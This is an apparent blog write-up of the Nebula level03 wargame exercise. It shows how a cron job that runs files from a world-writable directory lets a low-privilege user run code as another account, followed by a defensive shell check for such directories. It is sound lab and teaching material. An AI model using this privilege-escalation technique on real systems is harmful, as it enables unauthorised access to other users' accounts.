Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
cron is a utility used to run tasks periodically, found in nearly every distro.
In /home/flag03, we have a script – writable.sh – and a directory – writable.d.
level03@nebula:/home/flag03$ ls -sl
total 1
0 drwxrwxrwx 1 flag03 flag03 40 2014-06-03 03:39 writable.d
1 -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh
Let’s take a look at writable.sh:
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
    (ulimit -t 5; bash -x "$i")
    rm -f "$i"
done
This is fairly simple – for each file in the writable.d directory, run it with bash, then delete it. bash -x runs the script in trace mode, printing each command as it is executed. I think we can ignore ulimit -t 5 – it just limits the CPU time available to the shell, possibly to stop a malicious script consuming excess resources.
Note that the writable.d directory is world read/write – so we can just put a script in there:
level03@nebula:~$ cat getflag.sh
#!/bin/sh
/bin/getflag >> /tmp/flag03.out
level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/
Then wait a short while, assuming that the writable.sh script is the one being run by cron…
level03@nebula:/tmp$ ls -sl
total 4
4 -rw-rw-r-- 1 flag03 flag03 59 2014-06-04 09:39 flag03.out
level03@nebula:/tmp$ cat flag03.out
You have successfully executed getflag on a target account
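The root cause above is a job running as flag03 that executes whatever it finds in a world-writable directory. As an added example (not part of the original post or of Nebula itself), here is a pre-flight check a runner script could apply before executing anything from a drop-in directory. The function names are hypothetical and GNU stat is assumed.

```sh
#!/bin/sh
# Added example: ownership and permission checks for a drop-in directory.
# Hypothetical function names; assumes GNU stat (Linux).

# path_is_tight PATH UID: PATH is not a symlink, is owned by UID, and has
# no group-write or other-write bit set.
path_is_tight() {
    [ -e "$1" ] && [ ! -L "$1" ] || return 1
    [ "$(stat -c %u "$1")" = "$2" ] || return 1
    case $(stat -c %a "$1") in
        # Octal digits 2, 3, 6 and 7 contain the write bit.
        # Second-to-last digit is group, last digit is other.
        *[2367]? | *[2367]) return 1 ;;
    esac
    return 0
}

# list_runnable DIR UID: print the files in DIR that are safe to execute.
# Refuses (returns 1) if DIR itself can be written by anyone but UID,
# because then any per-file check could be raced or bypassed.
list_runnable() {
    [ -d "$1" ] && path_is_tight "$1" "$2" || {
        echo "refusing $1: not a directory writable only by uid $2" >&2
        return 1
    }
    for f in "$1"/*; do
        [ -f "$f" ] && path_is_tight "$f" "$2" && printf '%s\n' "$f"
    done
    return 0
}
```

With the permissions shown in the listing above (drwxrwxrwx on writable.d), list_runnable refuses the directory outright, so nothing dropped there by another user would be executed.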
Now – this is all well and good, but if we weren’t told that the script was run by cron, what could we do?
There is a root user in the Nebula VM, and using that I can do:
nebula@nebula:/var/spool/cron$ sudo crontab -u flag03 -l
*/3 * * * * /home/flag03/writable.sh
But I can’t do that as level03:
level03@nebula:/tmp$ crontab -u flag03 -l
must be privileged to use -u
Also, I could use ps to see that the process runs, but that would presume that I knew it was cron’ed anyway.
So, not sure how I would go about finding cron jobs as an unprivileged user.
I’ve asked on the Unix Stack Exchange.